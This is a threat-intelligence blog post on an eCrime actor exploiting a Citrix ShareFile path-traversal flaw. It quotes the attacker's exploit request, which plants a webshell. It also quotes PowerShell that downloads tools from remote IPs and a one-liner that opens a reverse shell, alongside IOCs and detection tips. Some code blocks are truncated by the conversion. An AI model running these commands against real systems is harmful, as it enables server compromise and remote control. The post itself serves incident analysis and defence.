# PROPHET SPIDER Exploits Citrix ShareFile

**[crowdstrike.com/blog/prophet-spider-exploits-citrix-sharefile/](https://www.crowdstrike.com/blog/prophet-spider-exploits-citrix-sharefile/)**

Chris Nguyen - Eric Loui March 7, 2022

At the start of 2022, CrowdStrike Intelligence and CrowdStrike Services investigated an
incident in which PROPHET SPIDER exploited CVE-2021-22941 — a remote code
execution (RCE) vulnerability impacting Citrix ShareFile Storage Zones Controller — to
compromise a Microsoft Internet Information Services (IIS) web server. The adversary
exploited the vulnerability to deploy a webshell that enabled the downloading of additional
tools. This incident highlights how PROPHET SPIDER continues to evolve their tradecraft
while continuing to exploit known web-server vulnerabilities.

## Background

### PROPHET SPIDER

[PROPHET SPIDER is an eCrime actor, active since at least May 2017, that primarily gains](https://www.crowdstrike.com/blog/prophet-spider-exploits-oracle-weblogic-to-facilitate-ransomware-activity/)
access to victims by compromising vulnerable web servers, which commonly involves
leveraging a variety of publicly disclosed vulnerabilities. The adversary has likely functioned
as an access broker — handing off access to a third party to deploy ransomware — in
multiple instances.


-----

### CVE-2021-22941

[In September 2021, Citrix disclosed a relative path-traversal vulnerability in ShareFile Zones](https://codewhitesec.blogspot.com/2021/09/citrix-sharefile-rce-cve-2021-22941.html)
Storage Controller, designated CVE-2021-22941. Shortly thereafter, security researchers
[demonstrated a proof-of-concept (POC) exploit for the CVE. Based on the known technical](https://codewhitesec.blogspot.com/2021/09/citrix-sharefile-rce-cve-2021-22941.html)
[details, others were able to reproduce fully weaponized exploits for CVE-2021-22941 that](https://github.com/hoavt184/CVE-2021-22941)
have proliferated since mid-October 2021. The vulnerability allows an adversary to overwrite
an existing file on a target server via an `uploadid parameter passed in an HTTP` `GET`
request.

## Initial Access and Exploitation

On Jan. 10, 2022, PROPHET SPIDER sent an HTTP `POST request to an IIS server of a`
CrowdStrike Falcon platform customer, using the user agent ® `python-requests/2.26.0 .`
The request to `/upload.aspx contained the following command:`
```
POST /upload.aspx?
uploadid=%40using+System.Diagnostics%3B%40%7Bint+idx0%3D+0%3Bstring+str_idx0+%3D+idx0.

```
There are three key components to this request.

The URI endpoint `/upload.aspx is used for ShareFile uploads and usually comes with`
parameters to define upload object specifications, such as uploadid, cid or batchid. In this
case, the uploadid parameter contained a webshell:
```
uploadid=@using+System.Diagnostics;@{int+idx0=+0;string+str_idx0+=+idx0.ToString();+in

```
This is content that the exploit will write to an ASP.NET file; it uses Razor syntax, where
```
@<keyword> allows a keyword to be used as a variable name, and @{ is used to open a

```
C# code block. The C# `Process.Start(cmd,arg); method provides the backdoor`
function that will be used to execute arbitrary commands.
```
/../../ConfigService\Views\Shared\Error.cshtml

```
This is the relative path traversal that will allow the payload to overwrite the legitimate
```
Error.cshtml page.
bp=123&accountid=123

```
These are parameters that are expected by the upload function and included to prevent an
error from occurring. Additionally, these values match the default characters used in the
[previously mentioned publicly available CVE-2021-22941 exploit.](https://github.com/hoavt184/CVE-2021-22941/blob/master/exploit.py)

Analysts looking for evidence of attempted CVE-2021-22941 exploitation can examine IIS
access logs for web requests that:

Target `upload.aspx`


-----

Contain encoded strings for `../ and`
```
   ConfigService\Views\Shared\Error.cshtml in the URL parameters

```
May contain `&bp=123&accountid=123 if the attacker has not customized the payload`

Once the webshell is set, it can be accessed by sending an HTTP request to
```
/configservice/Home/Error with one or two URL parameters. ASP.NET will direct these

```
requests to `Error.cshtml, which usually contains a simple HTML header saying “Sorry, an`
error occurred while processing your request.” Due to the exploit, the contents have been
replaced with the C# code block and will invoke `Process.Start(cmd.arg) using the URL`
parameter(s) passed in the `GET request.`

## Post-exploitation Commands

After achieving initial access, PROPHET SPIDER used the following command to test
connectivity:
```
CMD.exe /C nslookup xab8v404gwftvw5nvw95ig6ybphf54.burpcollaborator[.]net</code

```
If successful, this command performs a name lookup on a subdomain of
```
burpcollaborator[.]net, which the open-source vulnerability-testing tool BurpSuite can

```
check to confirm responding systems.

The adversary next attempted to execute encoded PowerShell commands that decoded to:
```
powershell -Command (New-Object
System.Net.WebClient).DownloadFile('http[:]//45.61.136[.]39:443/wget[.]bin','C:\Window
cmd /c c:\Windows\temp\wget.bin -t 1 http[:]//45.61.136[.]39:443/winn.exe -O
c:\windows\temp\wi.exe

```
These commands attempted to download the legitimate `wget utility from a remote IP`
address, then attempted to use `wget to download another remote binary, named`
```
winn.exe . The winn.exe download was unsuccessful. The adversary then attempted to

```
install an open-source reverse shell from GitHub:
```
powershell -Command IEX(IWR
https[:]//raw.githubusercontent[.]com/antonioCoco/ConPtyShell/master/InvokeConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell -RemoteIp 107.181.187[.]184 RemotePort 4242 -Rows 44 -Cols 166

```
This payload attempted to load the `ConPtyShell reverse shell directly from GitHub, with`
parameters to connect back to the IP address `107.181.187[.]184 over TCP port` `4242 .`

## Conclusion


-----

As CrowdStrike Intelligence previously reported, PROPHET SPIDER is an opportunistic
eCrime actor that exploits publicly disclosed server vulnerabilities, often to deliver webshells.
This recent CVE-2021-22941 exploitation demonstrates the adversary’s willingness to
operationalize new and different exploit code, as well as their enduring preference for
deploying the `wget utility to begin operations.`

### Indicators of Compromise (IOCs)

**Description** **IP Addresses**

Site hosting `wget.bin and` `winn.exe` `45.61.136[.]39`

Callback destination for `ConPtyShell` `107.181.187[.]184`
reverse shell

Source observed exploiting CVE-2021- `188.119.149[.]160`
22941

Site hosting `ConPtyShell reverse shell` `hxxps[:]//raw.githubusercontent[.]com`
```
                       /antonioCoco/ConPtyShell/master
                       /Invoke-ConPtyShell.ps1

```

### MITRE ATT&CK® Observed Tactics

**Tactic** **Description**

Initial Access T1190: [Exploit Public Facing Application](https://attack.mitre.org/techniques/T1190)

Execution T1059.001: [Command and Scripting Interpreter: PowerShell](https://attack.mitre.org/techniques/T1059/001/)

Persistence T1505.003: [Server Software Component: Web Shell](https://attack.mitre.org/techniques/T1505/003)

Command and Control T1071: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071/)

T1105: [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105/)

**Additional Resources**

_Read more about CrowdStrike’s observations of PROPHET SPIDER activity in this_
_[blog: PROPHET SPIDER Exploits Oracle WebLogic to Facilitate Ransomware Activity.](https://www.crowdstrike.com/blog/prophet-spider-exploits-oracle-weblogic-to-facilitate-ransomware-activity/)_
_To learn more about how to incorporate intelligence on threat actors into your security_
_strategy, visit the_ _[Falcon X™ Premium Threat Intelligence page.](https://www.crowdstrike.com/endpoint-security-products/falcon-x-threat-intelligence/premium/)_
_[Visit the CrowdStrike website to learn more about CrowdStrike Services.](https://www.crowdstrike.com/services/)_
_[Get a full-featured free trial of CrowdStrike Falcon Prevent™ and learn how true next-](https://go.crowdstrike.com/try-falcon-prevent.html)_
_gen AV performs against today’s most sophisticated threats._


-----